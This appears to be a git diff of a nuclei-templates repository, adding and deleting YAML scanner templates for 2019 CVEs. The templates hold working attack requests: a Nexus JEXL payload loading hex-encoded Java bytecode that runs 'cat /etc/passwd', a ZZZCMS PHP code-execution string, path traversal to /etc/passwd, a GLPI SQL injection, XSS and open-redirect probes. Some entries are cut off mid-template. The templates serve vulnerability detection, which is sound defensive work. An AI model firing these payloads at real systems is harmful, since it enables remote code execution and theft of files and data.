a/nuclei-templates/CVE-2019/CVE-2019-7238.yaml b/nuclei-templates/CVE-2019/CVE-2019-7238.yaml deleted file mode 100644 index dcc8e406c2..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-7238.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2019-7238 - -info: - name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution - author: pikpikcu - severity: critical - description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution. - reference: - - https://github.com/jas502n/CVE-2019-7238 - - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 - - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-7238 - tags: cve,cve2019,nexus,rce - -requests: - - raw: - - | - POST /service/extdirect HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - X-Requested-With: XMLHttpRequest - - {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-7275.yaml b/nuclei-templates/CVE-2019/CVE-2019-7275.yaml new file mode 100644 index 0000000000..26ef262b5d --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-7275.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-7275 + +info: + name: Open Redirect in Optergy Proton/Enterprise BMS + author: 0x_Akoko + severity: medium + description: Optergy Proton/Enterprise devices allow Open Redirect. + reference: + - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html + - https://applied-risk.com/resources/ar-2019-008 + - https://cxsecurity.com/issue/WLB-2019110074 + - https://applied-risk.com/labs/advisories + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-7275 + cwe-id: CWE-601 + tags: cve,cve2019,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/updating.jsp?url=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/CVE-2019/CVE-2019-7609.yaml b/nuclei-templates/CVE-2019/CVE-2019-7609.yaml deleted file mode 100644 index 3aba0a24bb..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-7609.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2019-7609 - -info: - name: Kibana Timelion - Arbitrary Code Execution - author: dwisiswant0 - severity: critical - description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. - reference: - - https://github.com/mpgn/CVE-2019-7609 - - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 - - https://nvd.nist.gov/vuln/detail/CVE-2019-7609 - - https://www.elastic.co/community/security - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2019-7609 - cwe-id: CWE-94 - epss-score: 0.97303 - tags: cve,cve2019,kibana,rce,kev - metadata: - max-request: 1 - -http: - - method: POST - path: - - "{{BaseURL}}/api/timelion/run" - headers: - Content-Type: "application/json; charset=utf-8" - - body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' - - matchers-condition: and - matchers: - - type: word - words: - - "seriesList" - part: body - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-8442.yaml b/nuclei-templates/CVE-2019/CVE-2019-8442.yaml deleted file mode 100644 index 5079f927ff..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-8442.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2019-8442 -info: - name: JIRA Directory Traversal - author: Kishore Krishna (siLLyDaddy) - severity: high - description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. - reference: - - https://jira.atlassian.com/browse/JRASERVER-69241 - - http://web.archive.org/web/20210125215006/https://www.securityfocus.com/bid/108460/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-8442 - tags: cve,cve2019,atlassian,jira,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" - - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'com.atlassian.jira' - part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml b/nuclei-templates/CVE-2019/CVE-2019-8449.yaml deleted file mode 100644 index e223ce24ae..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2019-8449 - -info: - name: Jira <8.4.0 - Information Disclosure - author: harshbothra_ - severity: medium - description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Upgrade Jira to version 8.4.0 or later to fix the information disclosure vulnerability. - reference: - - https://www.doyler.net/security-not-included/more-jira-enumeration - - https://jira.atlassian.com/browse/JRASERVER-69796 - - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-8449 - cwe-id: CWE-306 - epss-score: 0.24444 - epss-percentile: 0.96152 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: jira - shodan-query: http.component:"Atlassian Jira" - tags: atlassian,jira,disclosure,packetstorm,cve,cve2019 - -http: - - method: GET - path: - - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"users":{"users":' - - - type: status - status: - - 200 -# digest: 490a00463044022032fa3a37482232ad58a713b3742f38aa150a848abd5436973eef30186cf1291002207d3c889487f13b8f986f30af265fda4b8d960304c4c83d0940fd9cc6fd462265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-9041.yaml b/nuclei-templates/CVE-2019/CVE-2019-9041.yaml deleted file mode 100644 index f3628f2967..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-9041.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2019-9041 - -info: - name: ZZZCMS 1.6.1 - Remote Code Execution - author: pikpikcu - severity: high - description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring. - reference: - - https://www.exploit-db.com/exploits/46454/ - - http://www.iwantacve.cn/index.php/archives/118/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-9041 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2019-9041 - cwe-id: CWE-917 - tags: cve,cve2019,zzzcms,rce,edb - metadata: - max-request: 1 - -http: - - method: POST - path: - - "{{BaseURL}}/search/" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if} - - matchers-condition: and - matchers: - - type: word - words: - - "phpinfo" - - "PHP Version" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/08 diff --git a/nuclei-templates/CVE-2019/CVE-2019-9618.yaml b/nuclei-templates/CVE-2019/CVE-2019-9618.yaml deleted file mode 100644 index af204d6919..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-9618.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2019-9618 - -info: - name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) - author: daffainfo - severity: critical - description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - - https://seclists.org/fulldisclosure/2019/Mar/26 - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-9618 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 - - 500 diff --git a/nuclei-templates/CVE-2019/CVE-2019-9915.yaml b/nuclei-templates/CVE-2019/CVE-2019-9915.yaml deleted file mode 100644 index 0127935998..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-9915.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2019-9915 -info: - name: GetSimpleCMS 3.3.13 - Open Redirection - author: 0x_Akoko - severity: medium - description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter. - reference: - - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms - - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 - - https://www.cvedetails.com/cve/CVE-2019-9915 - - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-9915 - cwe-id: CWE-601 - metadata: - verified: "true" - tags: cve,cve2019,redirect,getsimple,cms -requests: - - raw: - - | - POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userid={{username}}&pwd={{password}}&submitted=Login - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2019/CVE-2019-9922.yaml b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml new file mode 100644 index 0000000000..c8af51903f --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-9922 +info: + name: JE Messenger 1.2.2 Joomla - Directory Traversal + author: 0x_Akoko + severity: high + description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files. + reference: + - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md + - https://www.cvedetails.com/cve/CVE-2019-9922 + - https://extensions.joomla.org/extension/je-messenger/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-9922 + cwe-id: CWE-22 + tags: cve,cve2019,joomla,messenger,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-0221.yaml b/nuclei-templates/CVE-2019/cve-2019-0221.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-0221.yaml rename to nuclei-templates/CVE-2019/cve-2019-0221.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1010287.yaml b/nuclei-templates/CVE-2019/cve-2019-1010287.yaml deleted file mode 100644 index 02fb5c9607..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-1010287.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2019-1010287 - -info: - name: Timesheet 1.5.3 - Cross Site Scripting - author: pikpikcu - severity: medium - description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - - http://www.mdh-tz.info/ # demo - tags: cve,cve2019,timesheet,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-1010287 - cwe-id: CWE-79 - metadata: - google-dork: inurl:"/timesheet/login.php" - -requests: - - raw: - - | - POST /timesheet/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '>' - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-1010290.yaml b/nuclei-templates/CVE-2019/cve-2019-1010290.yaml deleted file mode 100644 index a8967ed204..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-1010290.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2019-1010290 - -info: - name: Babel - Open Redirection - author: 0x_Akoko - severity: medium - description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker - reference: - - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/ - - https://www.cvedetails.com/cve/CVE-2019-1010290 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-1010290 - cwe-id: CWE-601 - tags: cve,cve2019,redirect,babel - -requests: - - method: GET - path: - - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2019/cve-2019-10232.yaml b/nuclei-templates/CVE-2019/cve-2019-10232.yaml new file mode 100644 index 0000000000..796e20b3de --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-10232.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-10232 + +info: + name: Pre-authenticated SQL injection in GLPI <= 9.3.3 + author: RedTeamBrasil + severity: critical + description: Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication. + reference: + - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf + - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c + tags: cve,cve2019,glpi,sqli,injection + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-10232 + cwe-id: CWE-89 + +requests: + - method: GET + path: + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "-MariaDB-" + - "Start unlock script" + condition: and + + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/nuclei-templates/CVE-2019/cve-2019-10475.yaml b/nuclei-templates/CVE-2019/cve-2019-10475.yaml deleted file mode 100644 index 483032d353..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-10475.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2019-10475 - -info: - name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting - author: madrobot - severity: medium - tags: cve,cve2019,jenkins,xss,plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-10475 - cwe-id: CWE-79 - description: "A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin." - reference: - - https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490 - - http://www.openwall.com/lists/oss-security/2019/10/23/2 - - http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html - -requests: - - method: GET - path: - - "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2019/cve-2019-11013.yaml b/nuclei-templates/CVE-2019/cve-2019-11013.yaml deleted file mode 100644 index d5cbcb989d..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-11013.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2019-11013 - -info: - name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal - author: 0x_Akoko - severity: medium - reference: - - https://www.exploit-db.com/exploits/47301 - - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 - tags: cve,cve2019,lfi,nimble - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 - cve-id: CVE-2019-11013 - cwe-id: CWE-22 - description: "Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server." - -requests: - - method: GET - path: - - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-11248.yaml b/nuclei-templates/CVE-2019/cve-2019-11248.yaml deleted file mode 100644 index 7d3e107c36..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-11248.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2019-11248 - -info: - name: exposed_pprof - author: 0xceeb - severity: high - tags: cve,cve2019,debug - description: The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. - reference: - - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - - http://mmcloughlin.com/posts/your-pprof-is-showing - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L - cvss-score: 8.20 - cve-id: CVE-2019-11248 - cwe-id: CWE-862 - -requests: - - method: GET - path: - - "{{BaseURL}}/debug/pprof/" - matchers: - - type: word - words: - - "Types of profiles available:" - - "Profile Descriptions" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-11370.yaml b/nuclei-templates/CVE-2019/cve-2019-11370.yaml new file mode 100644 index 0000000000..0d2b1b1d75 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-11370.yaml @@ -0,0 +1,53 @@ +id: CVE-2019-11370 + +info: + name: Carel pCOWeb \">') + condition: and +# digest: 4a0a0047304502206211cfa838795769776a00d7ccfcedaa1fe50255fc01e8f945c461b0d2ebc946022100f37746cb8f51e8f7d78c8730d26614a8b2ffc9a7d999c013d5b875cf3568d608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-12314.yaml b/nuclei-templates/CVE-2019/cve-2019-12314.yaml new file mode 100644 index 0000000000..6447b9ad1c --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12314.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-12314 + +info: + name: Deltek Maconomy 2.2.5 LFIl + author: 